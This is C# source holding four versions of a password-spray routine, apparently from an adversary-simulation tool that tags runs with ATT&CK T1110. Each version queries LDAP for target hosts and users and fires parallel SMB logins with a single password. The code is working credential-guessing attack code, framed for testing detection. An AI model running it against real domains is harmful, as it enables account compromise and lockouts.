public static void RemotePasswordSpray(int type, int computertype, int nhost, int usertype, int nuser, int protocol, int sleep, string password, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1110"); //logger.TimestampInfo(String.Format("Starting T1110 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); logger.TimestampInfo(String.Format("Remote Domain Brute Force")); bool Kerberos = new bool(); List <Computer> targets = new List <Computer>(); List <User> targetusers = new List <User>(); List <Task> tasklist = new List <Task>(); string domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; if (usertype == 4) { domain = "."; } try { logger.TimestampInfo(String.Format("Querying LDAP for random targets...")); targets = Lib.Targets.GetHostTargets(computertype, nhost); logger.TimestampInfo(String.Format("Obtained {0} target computers", targets.Count)); targetusers = Lib.Targets.GetUserTargets(usertype, nuser); logger.TimestampInfo(String.Format("Obtained {0} target user accounts", targetusers.Count)); switch (protocol) { case 1: Kerberos = true; break; case 2: Kerberos = false; break; default: return; } //Console.WriteLine("[*] Starting Domain Password Spray Attack from {0}", Environment.MachineName); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); } if (type == 1) { var random = new Random(); int index = random.Next(targets.Count); logger.TimestampInfo(String.Format("Picking {0} as a target", targets[index].ComputerName)); foreach (User user in targetusers) { User tempuser = user; int tempindex = index; if (sleep > 0 && tempindex > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } else if (type == 2) { Kerberos = false; int loops; if (targetusers.Count >= targets.Count) { loops = targets.Count; } else { loops = targetusers.Count; } for (int i = 0; i < loops; i++) { int temp = i; if (sleep > 0 && temp > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RemotePasswordSpray(int nhost, int nuser, int sleep, string password, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1110.003"); logger.TimestampInfo(String.Format("Remote Domain Brute Force using the WNetAddConnection2 Win32 API function")); bool Kerberos = new bool(); List <Computer> targets = new List <Computer>(); List <User> targetusers = new List <User>(); List <Task> tasklist = new List <Task>(); string domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; try { var rand = new Random(); int usertype = rand.Next(1, 7); usertype = 1; if (usertype == 6) { domain = "."; } //int protocol = rand.Next(1, 3); // Executing a remote authentication with Kerberos will not connect to the remote host, just the DC. int protocol = 2; logger.TimestampInfo(String.Format("Querying LDAP for random targets...")); int computertype = rand.Next(1, 5); targets = Lib.Targets.GetHostTargets(computertype, nhost, logger); logger.TimestampInfo(String.Format("Obtained {0} target computers", targets.Count)); targetusers = Lib.Targets.GetUserTargets(usertype, nuser, logger); logger.TimestampInfo(String.Format("Obtained {0} target user accounts", targetusers.Count)); switch (protocol) { case 1: Kerberos = true; break; case 2: //using NTLM Kerberos = false; break; default: return; } if (sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep)); } int type = rand.Next(1, 3); if (type == 1) { //Remote spray against a random target host var random = new Random(); int index = random.Next(targets.Count); logger.TimestampInfo(String.Format("Picking {0} as a target", targets[index].ComputerName)); foreach (User user in targetusers) { User tempuser = user; int tempindex = index; if (sleep > 0 && tempindex > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } else if (type == 2) { //Remote spray against several hosts, distributed int loops; if (targetusers.Count >= targets.Count) { loops = targets.Count; } else { loops = targetusers.Count; } for (int i = 0; i < loops; i++) { int temp = i; if (sleep > 0 && temp > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RemoteDomainPasswordSpray(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1110.003"); logger.TimestampInfo(String.Format("Remote Domain Brute Force using the WNetAddConnection2 Win32 API function")); bool Kerberos = false; List <Computer> host_targets = new List <Computer>(); List <User> user_targets = new List <User>(); List <Task> tasklist = new List <Task>(); string domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; try { if (playbook_task.user_target_type == 99) { domain = "."; } // Executing a remote authentication with Kerberos will not connect to the remote host, just the DC. Kerberos = false; host_targets = Targets.GetHostTargets(playbook_task, logger); user_targets = Targets.GetUserTargets(playbook_task, logger); //if (playbook_task.protocol.ToUpper().Equals("NTLM")) Kerberos = false; if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep)); } if (playbook_task.host_target_type == 1 || playbook_task.host_target_type == 2) { //Remote spray against one target host //Target host either explictly defined in the playbook or randomly picked using LDAP queries foreach (User user in user_targets) { User tempuser = user; //int tempindex = index; //if (playbook_task.task_sleep > 0 && tempindex > 0) Thread.Sleep(playbook_task.task_sleep * 1000); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(host_targets[0], domain, tempuser.UserName, playbook_task.spray_password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } else if (playbook_task.host_target_type == 3 || playbook_task.host_target_type == 4) { //Remote spray against several hosts, distributed //Target hosts either explictly defined in the playbook or randomly picked using LDAP queries int loops; if (user_targets.Count >= host_targets.Count) { loops = host_targets.Count; } else { loops = user_targets.Count; } for (int i = 0; i < loops; i++) { int temp = i; if (playbook_task.task_sleep > 0 && temp > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(host_targets[temp], domain, user_targets[temp].UserName, playbook_task.spray_password, Kerberos, logger); })); } Task.WaitAll(tasklist.ToArray()); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RemotePasswordSpray(int type, int computertype, int nhost, int usertype, int nuser, int protocol, int sleep, string password) { bool Kerberos = new bool(); List <Computer> targets = new List <Computer>(); List <User> targetusers = new List <User>(); List <Task> tasklist = new List <Task>(); String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; if (usertype == 4) { domain = "."; } targets = Lib.Targets.GetHostTargets(computertype, nhost); targetusers = Lib.Targets.GetUserTargets(usertype, nuser); switch (protocol) { case 1: Kerberos = true; break; case 2: Kerberos = false; break; default: return; } Console.WriteLine("[*] Starting Domain Password Spray Attack from {0}", Environment.MachineName); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); } if (type == 1) { var random = new Random(); int index = random.Next(targets.Count); foreach (User user in targetusers) { User tempuser = user; int tempindex = index; if (sleep > 0 && tempindex > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[tempindex], domain, tempuser.UserName, password, Kerberos); })); } Task.WaitAll(tasklist.ToArray()); } else if (type == 2) { int loops; if (targetusers.Count >= targets.Count) { loops = targets.Count; } else { loops = targetusers.Count; } for (int i = 0; i < loops; i++) { int temp = i; if (sleep > 0 && temp > 0) { Thread.Sleep(sleep * 1000); } tasklist.Add(Task.Factory.StartNew(() => { CredAccessHelper.RemoteSmbLogin(targets[temp], domain, targetusers[temp].UserName, password, Kerberos); })); } Task.WaitAll(tasklist.ToArray()); } }